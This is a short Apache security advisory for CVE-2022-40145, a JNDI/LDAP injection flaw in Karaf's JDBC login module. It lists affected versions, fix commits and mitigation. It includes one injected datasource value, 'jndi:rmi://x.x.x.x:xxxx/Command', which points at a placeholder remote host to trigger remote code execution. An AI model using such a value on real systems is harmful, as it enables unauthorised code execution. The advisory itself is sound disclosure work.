A new security advisory has been released for Apache Karaf, which was fixed in the 4.3.8 and 4.4.2 releases.
CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8 Severity: Low Vendor: The Apache Software Foundation Versions Affected: all versions of Apache Karaf runtime prior to 4.3.8 and 4.4.2. Description: This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when aconfiguration uses a JNDI LDAP data source URI when an attacker hascontrol of the target LDAP server. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341 https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1 Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2 or later as soon as possible, or disable JDBC login module. JIRA Ticket: https://issues.apache.org/jira/browse/KARAF-7568 Credit: This issue was discovered and reported by Xun Bai <bbbbea...@gmail.com>
